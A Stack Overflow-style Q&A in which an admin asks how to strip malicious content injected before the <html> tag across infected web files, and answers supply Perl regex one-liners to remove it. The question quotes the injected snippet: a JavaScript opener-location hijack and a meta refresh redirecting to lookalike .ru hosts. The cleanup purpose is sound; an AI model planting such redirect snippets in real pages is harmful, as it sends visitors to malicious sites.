How can I replace everything before the <html> tag with a Perl command?

Question

A folder on a webserver I manage was recently infected, and a malicious script was placed before the opening <html> tag on a whole mess of files. I'm trying to execute a perl string replace script to clean it out.

The malicious files look something like this:

<script language="JavaScript">
parent.window.opener.location="http://vkk.coom.ny8pbpk.ru?nhzwhhh=ZE9taWlsX2nkPRE0LmZub3ffaUQ9PTM3MCbjb0RlNWFlZnrvaEx2b2JydWLuYUJxfwC%3D%3D";
</script>
<meta http-equiv="refresh" content="0;URL=http://yandex.ru.ny8pbpk.ru?pk=i%2FGWhteXsNcf0qzPwdiVgMkkhvrG1YbO25gYgPqe2saQmdIDmeiUlsiXmNEQmPCfhMSD5" />
<html>
<head>
......and the file goes on

I'm something of a mess with Regex, and I've tried to glean as much as I can from other StackOverflow posts on how to use perl's string replace. The biggest issue I'm running into is making it work over multiple lines.

Here's what I have so far:

perl -0777 -i -pe 's/\s*<html>/<html>/s' index.html

This seems to have no effect. If I change the second <html> to <foobar> it correctly replaces with foobar, but it ignores everything in front of it.

From what I can tell, the -0777 flag is supposed to "slurp" as one line, and the \s* should match the entire string before <html>, but again, my regex is lacking. Any help is greatly appreciated!

Casimir et Hippolyte · Accepted Answer · 2013-07-13 11:37:40Z

2

Try this:

perl -0777 -i -pe 's/^.*(?=<html>)//s' index.html

or this safer and more efficient pattern:

perl -0777 -i -pe 's/^(?>[^<]++|<(?!html>))*(?=<html>)//' index.html

edited Jul 13, 2013 at 11:37

answered Jul 13, 2013 at 1:56


1 Comment

mirod Over a year ago

If the string '<html>' is not present in the infected part, it's probably slightly safer to write s/^.*?(?=<html>)//s. This avoids deleting too much text if '<html>' is found somewhere in the body of the page (as in <p>Example of an html document:</p><pre><![CDATA[<html>blah blah...</html>]]></pre>). That's unlikely, but who knows...

Jeanne Boyarsky · Accepted Answer · 2013-07-13 01:37:12Z

1

\s* is too specific. You don't only want to match whitespace before the <html>. Try .* which matches everything before the <html>.

answered Jul 13, 2013 at 1:37


2 Comments

Ryan Erdmann Over a year ago

Thanks, this helped steer me onto the right track! The issue was that \s was only matching whitespace. [\s\S] will match whitespace or non-whitespace, which is everything!

Jeanne Boyarsky Over a year ago

With the /s modifier, . (dot) does the same thing and is a more common pattern. It's less code and what readers of your code are more likely to expect.

Ryan Erdmann · Accepted Answer · 2013-07-13 01:43:55Z

0

\s* should be [\s\S]* so it matches all characters.

I found this to be a great reference: http://www.cs.tut.fi/~jkorpela/perl/regexp.html

So the final working command is:

perl -0777 -i -pe 's/[\s\S]*<html>/<html>/s' index.html

answered Jul 13, 2013 at 1:43
